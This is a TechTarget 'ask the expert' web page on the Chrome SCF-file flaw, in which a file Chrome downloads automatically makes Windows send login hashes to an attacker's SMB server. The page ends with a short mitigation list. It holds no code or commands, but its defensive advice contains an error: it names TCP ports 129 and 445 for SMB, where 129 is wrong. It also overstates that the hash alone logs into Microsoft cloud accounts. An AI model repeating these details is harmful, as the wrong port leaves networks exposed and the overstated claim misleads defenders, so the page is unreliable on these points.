I recently read that a vulnerability in Google Chrome could enable hackers to remotely steal user login credentials...
By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers.
on Windows systems. How does this vulnerability work? Are there any extra steps users can take to protect their credentials?
This vulnerability was uncovered by DefenseCode researcher Bosko Stankovic when he used Google Chrome to visit a website. The website contained a malicious shell command file (SCF).
The legitimate SCF shortcut file format works like Windows shortcut LNK files, such as My Computer and Recycle Bin. Microsoft forces LNK files to load their icons from local resources, but it doesn't specify where SCF files should be loaded.
Stankovic demonstrated how an SCF file can send a victims' Windows login credentials to an attacker's server message block (SMB) server. The SMB protocol is for sharing files and printers.
As soon as the user gets on the SMB server, the SMB authentication attacks begin. The user is unaware that a file is automatically downloaded onto his local computer. The victim isn't prompted for download confirmation.
When the user opens the folder containing the downloaded file, the malicious file doesn't wait for the user to confirm it. The file automatically runs to retrieve an icon. The malicious SCF file doesn't set the location of an icon image. It contains the location of the attacker's SMB server.
During the attack, Windows doesn't ask the victim to enter local or network login credentials, as the credentials are automatically sent to the SMB server. The attacker can use an encrypted password in its hashed form to log in to the user's OneDrive, Outlook, Office 365 and other Microsoft accounts. There is no need for the decryption of password hashes.
To prevent SMB server authentication attacks, users should:
- Block outbound SMB server connections (TCP ports 129 and 445) from the local network to the WAN via firewalls.
- Disable automatic downloads in Chrome.
- Configure Chrome properly.
- Change passwords more often.
Ask the expert:
Want to ask Judith Myerson a question about security? Submit your question now via email. (All questions are anonymous.)
Learn how to set up two-factor authentication for enterprise users
Find out why privileged user management must top security team's to-do list
Discover whether the FIDO authentication standard could signal the passing of passwords
Dig Deeper on Password management and policy
Related Q&A from Judith Myerson
Using SNMP v3 is a good first step, but it's not enough to prevent attackers from accessing a network through an SNMP-enabled device. Expert Judith ...continue reading
SMS authentication is often used to secure telematics information, but it may not be strong enough. Expert Judith Myerson discusses why, and how to ...continue reading
Two VMware vulnerabilities in vSphere Data Protection were recently patched. Expert Judith Myerson explains how the flaws work and how to defend ...continue reading
Have a question for an expert?
Please add a title for your question
Get answers from a TechTarget expert on whatever's puzzling you.